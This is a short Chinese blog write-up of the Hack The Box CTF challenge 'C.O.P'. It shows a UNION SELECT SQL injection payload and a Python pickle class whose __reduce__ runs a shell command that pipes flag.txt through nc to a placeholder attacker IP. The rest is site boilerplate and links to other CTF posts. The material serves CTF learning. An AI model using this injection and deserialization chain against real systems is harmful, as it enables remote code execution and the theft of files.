[CTF] HTB C.O.P

于 2024-05-03 18:33:00 发布
阅读量250 收藏 5
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LLLZDQ/article/details/138421403
版权

HTB C.O.P

网站有两个 routes,一个是主页有四个商品,还有四个商品的页面。

商品的查找是这样的:


其中 product_id 我们可以用 urlencode 写成任意字符串,所以这里可以 sql injection。用 0' UNION SELECT '{data}'-- 可以把 data 传过去显示回来。但是这个 sql 好像不能读文件。

它数据库里是用 base64+pickle 写的,pickle 是有漏洞的,可以执行任意代码。在本地(公网 ip)开一个 nc -l 1234 监听,自己写一个类带以下这个函数:

class Item:
    def __reduce__(self):
        import os
        return os.system, ("cat flag.txt | nc your.ip.here 1234",)

通过前面的 sql injection 传过去一个自己的类,它就会执行这个代码然后就可以在本地收到 flag。

没有看提示/题解,但是花的时间还是比较长。主要花在读代码、不熟悉各种软件语法。找一个 python 断点输出的工具可能不错。

LLLZDQ
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTF baby_web
艺博东的博客
09-25 8475
题目描述:想想初始页面是哪个 题目场景: http://220.249.52.133:49388 1、点击链接进入一下界面 2、URL:把“1.php”为“index.php”—>回车 3、查看源代码(按F12或Fn+F12) 4、点中“Network”—>点击“index.php” 5、Response Headers—>FLAG: flag{very_baby_web} 6、OK flag{very_baby_web} ...
CTF Broadcast
热门推荐
艺博东的博客
09-25 1万+
题目来源: 2019_Redhat 题目描述: 粗心的Alice在制作密码的时候,把明文留下来,聪明的你能快速找出来吗? 题目附件: 附件1 1、 附件1 2、解压后 3、选中“task.py”—>打开 4、可直接找到flag #!/usr/bin/env python3 from Crypto.Util import number from Crypto.PublicKey import RSA from hashlib import sha256 import json #from s
CTF warmup
艺博东的博客
09-28 1万+
难度系数: ★★ 题目来源: HCTF 题目描述: 暂无 题目场景: http://220.249.52.133:38343 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、查看源代码(按F12或F12+Fn),出现以下代码。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport
CTF ics-04
艺博东的博客
10-05 9940
难度系数: ★★★★ 题目来源: XCTF 4th-CyberEarth 题目描述: 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 题目场景: http://220.249.52.133:52962(温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、先注册几个账号,相同的用户名 3、登录—>忘记密码 4、忘记密码 5、在kail Linux 里,开始sql注入 执行如下: 5.1 sqlmap ‐u "http://220.249.52.133:5296
CTF supersqli
艺博东的博客
09-25 1万+
题目来源: 强网杯 2019 题目描述: 随便注 题目场景: http://220.249.52.133:31334 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、‘1’—>提交 3、使用union select 爆字段 —>提交 4、1’;show databases;#—>提交 5、1’;show tables;#—>提交 6、1’;show columns from words;#(查询words表中所有列:)—>提交 7、
write-ups:来自CTFHTB演练的文章
03-21
写作 :triangular_flag: CTF和Hackthebox演练撰写文章 目录
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
CTF题库超详细资源合集
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统...
ctf拼图例题-puzzle
04-13
关于puzzle例题的原题资源,搭配文章使用更配噢 https://editor.csdn.net/md/?articleId=124139016
CTF easycap Banmabanma
艺博东的博客
10-06 1万+
题目来源: bsidessf-ctf-2017 题目描述: 你能从截取的数据包中得到flag吗? 题目附件: 附件1 1、附件1 链接:https://pan.baidu.com/s/1N6f-E7U9vzcpva_REiqX5A 提取码:u6p4 2、文件 3、用Wireshar打开文件 4、右键—>追踪流—>TCP流 5、OK FLAG:385b87afc8671dee07550290d16a8071 ...
CTF mysql
艺博东的博客
10-05 1万+
难度系数: ★★★★★ 题目来源: XCTF 题目描述: 我们在Mysql数据库中存放了flag,但是黑客已经把它删除了。你能找回来flag吗? 题目场景: 暂无 题目附件: 附件1 1、附件1 链接:https://pan.baidu.com/s/12RPRNl7PPgNBLpLatI68Fw 提取码:q57k 2、文件 3、把文件拷贝到 kail Linux 环境 4、点击空白处,鼠标右键—>在这里打开终端 5、strings:在对象文件或二进制文件中查找可打印的字符串。 用法:strin
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8288
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
“推荐系统”相关资源推荐
06-14
推荐了国内外对推荐系统的讲解相关资源
全渠道电商平台业务中台解决方案.pptx
06-14
全渠道电商平台业务中台解决方案.pptx
云计算企业私有云平台建设方案.pptx
06-14
云计算企业私有云平台建设方案.pptx
通过CNN卷积神经网络对盆栽识别-含图片数据集.zip
最新发布
06-14
本代码是基于python pytorch环境安装的。 下载本代码后,有个requirement.txt文本,里面介绍了如何安装环境,环境需要自行配置。 或可直接参考下面博文进行环境安装。 https://blog.csdn.net/no_work/article/details/139246467 如果实在不会安装的,可以直接下载免安装环境包,有偿的哦 https://download.csdn.net/download/qq_34904125/89365780 安装好环境之后, 代码需要依次运行 01数据集文本生成制作.py 02深度学习模型训练.py 和03pyqt_ui界面.py 数据集文件夹存放了本次识别的各个类别图片。 本代码对数据集进行了预处理,包括通过在较短边增加灰边,使得图片变为正方形(如果图片原本就是正方形则不会增加灰边),和旋转角度,来扩增增强数据集, 运行01数据集文本制作.py文件,会就读取数据集下每个类别文件中的图片路径和对应的标签 运行02深度学习模型训练.py就会将txt文本中记录的训练集和验证集进行读取训练,训练好后会保存模型在本地
0.96寸OLED显示屏
06-14
尺寸与分辨率:该显示屏的尺寸为0.96英寸,常见分辨率为128x64像素,意味着横向有128个像素点,纵向有64个像素点。这种分辨率足以显示基本信息和简单的图形。 显示技术:OLED(有机发光二极管)技术使得每个像素都能自发光,不需要背光源,因此对比度高、色彩鲜艳、视角宽广,且在低亮度环境下表现更佳,同时能实现更低的功耗。 接口类型:这种显示屏通常支持I²C(IIC)和SPI两种通信接口,有些型号可能还支持8080或6800并行接口。I²C接口因其简单且仅需两根数据线(SCL和SDA)而广受欢迎,适用于降低硬件复杂度和节省引脚资源。 驱动IC:常见的驱动芯片为SSD1306,它负责控制显示屏的图像显示,支持不同显示模式和刷新频率的设置。 物理接口:根据型号不同,可能有4针(I²C接口)或7针(SPI接口)的物理连接器。 颜色选项:虽然大多数0.96寸OLED屏为单色(通常是白色或蓝色),但也有双色版本,如黄蓝双色,其中屏幕的一部分显示黄色,另一部分显示蓝色。
2024年欧洲高端家用P1.29 LED显示屏市场主要企业市场占有率及排名.docx
06-14
2024年欧洲高端家用P1.29 LED显示屏市场主要企业市场占有率及排名
CTF reverse
12-25
CTF reverse(CTF逆向工程)是指在CTF竞赛中涉及到的逆向分析和破解技术。逆向工程是通过对软件进行反汇编、反编译等操作,来理解其内部结构和实现原理的过程。在CTF reverse中,参赛选手需要具备较强的逆向分析能力...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值